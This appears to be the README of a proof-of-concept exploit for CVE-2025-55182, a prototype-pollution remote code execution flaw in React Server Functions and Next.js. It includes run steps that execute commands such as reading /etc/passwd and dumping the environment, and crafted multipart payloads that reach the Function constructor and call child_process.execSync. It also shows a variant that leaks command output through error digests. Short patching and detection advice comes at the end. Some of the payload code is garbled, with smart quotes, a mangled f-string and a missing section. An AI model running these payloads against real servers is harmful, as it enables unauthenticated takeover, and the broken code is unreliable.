## https://sploitus.com/exploit?id=221A3D9E-872F-55D3-B6C5-C8646FC9FC6B
# CVE-2025-55182
This is the exploit code for a **Remote Code Execution (RCE) vulnerability** in React Server Functions (such as Next.js). It exploits prototype pollution to execute arbitrary code on the server without authentication. > **Note**: This repository is for educational and research purposes only. Use at your own risk.
## Overview
### Affected Versions
- **Next.js**: Before 16.0.6 (vulnerable)
- **React**: Before this commit ([https://github.com/facebook/react/pull/35277/commits/e2fd5dc6ad973dd3f220056404d0ae0a8707998d](https://github.com/facebook/react/pull/35277/commits/e2fd5dc6ad973dd3f220056404d0ae0a8707998d))**
### Severity of the Vulnerability
- **CVSS**: High (detailed score not published)
- **Attack Difficulty**: Low (can be exploited with a single HTTP request without authentication)
- **Impact**: Execution of arbitrary code on the server
### Cause of the Vulnerability
The vulnerability arises from improper validation of the prototype chain during the deserialization process of the React Flight Protocol. This allows access to the `Function` constructor through `__proto__`, enabling the execution of arbitrary JavaScript code.
## How to Use
### Docker Environment (Recommended)
This is the simplest way to test the vulnerability.
```bash
# 1. Start the vulnerable Next.js server
docker compose up -d --build
# 2. Run the exploit (default: id command)
docker compose run --rm poc
# 4. Run custom commands
docker compose run --rm -e COMMAND="whoami" poc
docker compose run --rm -e COMMAND="cat /etc/passwd" poc
docker compose run --rm -e COMMAND="env" poc
# 5. Stop the server
docker-compose down
```
## Technical Explanation
### 1. Prerequisites
#### What are React Server Functions?
They are server-side API functions provided by Next.js and others. Example:
```typescript
// Server Action (function executed only on the server side)
async function submitForm(formData) {
'use server' // Declaration of the server function
// Server-side processing, such as database operations
const result = await db.insert(formData)
return result
}
```
When called from the client, it sends an HTTP request to the server. The request’s parameters are serialized/deserialized using the React Flight Protocol. The server then executes the function and returns the result to the client.
#### How does the React Flight Protocol work?
The client sends data in units called “chunks”:
```python
files = {
"0": (None, '["$1"]'), # Chunk 0: Reference to Chunk 1
"1": (None, '{"object":"fruit","name":"$2:fruitName"}'), # Chunk 1: References fruitName in Chunk 2
"2": (None, '{"fruitName":"cherry"}'), # Chunk 2: Actual data
}
```
On the server side, these chunks are deserialized into:
```javascript
{ object: 'fruit', name: 'cherry' }
```
The key point is that references between chunks are possible.
### 2. Details of the Vulnerability
#### Problem
In commits before [this specific commit](https://github.com/facebook/react/pull/35277/commits/e2fd5dc6ad973dd3f220056404d0ae0a8707998d), there was no check to ensure that the keys actually existed in the objects. This allowed access to the prototype chain. #### Basic Exploitation (Accessing the Function Constructor)
```python
files = {
"0": (None, '["$1:__proto__:constructor:constructor"]'),
"1": (None, '{"x":1}'),
}
```
The reference resolution process:
```
Chunk 1’s object → __proto__ → constructor → constructor → Function
```
Result:
```javascript
[Function: Function] // Obtained the Function constructor!
“reason”: -1, # To prevent errors when using toString()
“value”: ‘{"then":“$B0"}’, # Setting then using blob reference
“_response”: {
“_prefix”: “process.mainModule.require('child_process').execSync('calc');”,
“_formData”: {
“get”:“$1:constructor:constructor”, # Function constructor
},
}
files = {
“0”: (None, json.dumps(crafted_chunk)),
“1”: (None,“‘$@0’”),
}
**Execution Flow:**
response._formData.get(response._prefix + “0”)
↓
Function(“process.mainModule.require('child_process').execSync('calc');0”)
↓
// This function is called after awaiting → Code execution!
---
### 4. PoC’s Operation
`poc.py` implements the above payload and extracts command execution results from error messages:
```python
# Embed command output into the error digest field
“_prefix”: f“var res = process.mainModule.require('child_process').execSync({‘EXECUTABLE’:{{‘timeout’:5000}}}).toString().trim(); throw Object.assign(new Error('NEXT_REDIRECT'), {{digest:‘${{res}}`}});”
```
By setting “Next-Action: x” in the HTTP header, the attack becomes effective:
```python
headers = {"Next-Action": "x"}
res = requests.post(BASE_URL, files=files, headers=headers)
```
**Important:** This attack occurs during **deployment**, so it is executed before action validation (`getActionModIdOrError`). ---
## Countermeasures
### For Developers
1. **Update immediately**: Update React and Next.js to the latest versions.
```bash
npm update react react-dom next
```
2. **Version Verification**:
```bash
npm list react next
```
- Next.js 16.0.7 and later
- React 19.2.1 and later (including corrected commits)
3. **WAF/Security Measures**:
- Monitor “Next-Action” headers
- Block abnormal form data
### Vulnerability Scan
```bash
# Check project vulnerabilities
npm audit
```
---
## References
1. [React Server Functions Official Documentation](https://react.dev/reference/rsc/server-functions)
2. [Understanding React Flight Protocol](https://tonyalicea.dev/blog/understanding-react-server-components/)
3. [Corrected Commits](https://github.com/facebook/react/pull/35277/commits/e2fd5dc6ad973dd3f220056404d0ae0a8707998d)
4. [JavaScript Object Prototypes Explanation](https://developer.mozilla.org/ja/docs/Learn/JavaScript/Objects/Object_prototypes)
5. [Function Constructor](https://developer.mozilla.org/ja/docs/Web/JavaScript/Reference/Global_Objects/Function/Function)
6. [Discoverer: maple3142](https://x.com/maple3142)
---
## Licenses and Terms of Use
This repository is provided **only for educational and research purposes**. - Using it on third-party systems without permission is illegal.
- The creator does not assume any responsibility for any damages caused by its use.
- Please use this tool with caution.
---
## Contributions
Vulnerability discovery: [maple3142](https://x.com/maple3142)
PoC implementation: The creator of this repository
[source-iocs-preserved method=response._formData.get(response._prefix + "0"),response._formData.get(response._prefix + obj)]